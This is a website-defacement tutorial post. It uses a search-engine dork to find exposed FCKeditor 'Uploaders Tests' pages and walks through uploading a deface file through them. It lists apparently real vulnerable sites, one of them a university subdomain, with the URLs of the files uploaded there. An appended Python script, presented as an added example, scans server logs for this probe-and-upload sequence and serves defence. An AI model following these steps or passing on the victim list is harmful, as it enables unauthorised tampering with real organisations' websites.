
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Category of Vulnerability: Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Steps to follow:
Go to Google.com or Bing.com and type this dork: intitle:"FCKeditor - Uploaders Tests"
(use both search engines to get more vulnerable websites)
The results lead to the FCKeditor upload option; you can also reach the upload option by going to this URL:
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now change the 'Select the "File Uploader" to use' option to PHP.
Then select your .txt deface file and click "Send it to the Server" (some websites allow you to upload .html and .jpg files).
If your file uploads successfully, you will get a "File uploaded with no errors" alert.
To view your file, see the Uploaded File URL
or go to:
http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo :
http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://www.relationshiptrends.com/affiliate/img/ck.txt
http://minisite.nku.edu.tr//userfiles/ck.txt
Next time I will post many such tutorials. Stay updated, stay connected :).
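For the site owner's side of the steps above, the following added example (not part of the original post) reviews web server access logs for the sequence the post describes: a request for `uploadtest.html`, a POST to a file-manager connector, and a read from `/userfiles/`. The log lines, client addresses and the `php/upload.php` connector path are constructed sample input, and the common/combined log format is an assumption.

```python
import re
from collections import defaultdict

# Paths from the post: the uploader test page and the default upload directory.
TEST_PAGE = re.compile(r"/editor/filemanager/connectors/uploadtest\.html", re.I)
CONNECTOR = re.compile(r"/editor/filemanager/connectors/", re.I)
USERFILES = re.compile(r"/userfiles/[^?\s]+", re.I)
# Common/combined log format: ip - - [time] "METHOD path proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample input (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2024:10:00:20 +0000] "POST /fckeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 310',
    '203.0.113.7 - - [10/Mar/2024:10:00:31 +0000] "GET /userfiles/ck.txt HTTP/1.1" 200 42',
    '198.51.100.9 - - [10/Mar/2024:11:15:02 +0000] "GET /FCKeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 209',
    '192.0.2.5 - - [10/Mar/2024:12:00:00 +0000] "GET /userfiles/logo.png HTTP/1.1" 200 9000',
]

def review(lines):
    """Summarise, per client, requests for the uploader test page, successful
    POSTs to a file-manager connector, and later reads from /userfiles/."""
    report = defaultdict(lambda: {"probed": False, "page_served": False,
                                  "uploads": 0, "fetched": []})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, method, url, status = m.groups()
        path, ok = url.split("?", 1)[0], status.startswith("2")
        if TEST_PAGE.search(path):
            report[ip]["probed"] = True
            report[ip]["page_served"] |= ok  # 2xx: the test page is exposed
        elif method == "POST" and CONNECTOR.search(path) and ok:
            report[ip]["uploads"] += 1
        elif (method == "GET" and USERFILES.search(path) and ok
              and ip in report and report[ip]["uploads"]):
            report[ip]["fetched"].append(path)  # read-back after an upload
    return dict(report)

def suspicious(report):
    """Clients that were served the test page and then uploaded through a connector."""
    return sorted(ip for ip, r in report.items() if r["page_served"] and r["uploads"])

if __name__ == "__main__":
    for ip in suspicious(review(SAMPLE_LOG)):
        print("review uploads from", ip)
```

A 2xx response for the test page is worth acting on by itself, since it shows the page is reachable from outside.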
I researched the file upload; for more information you may click here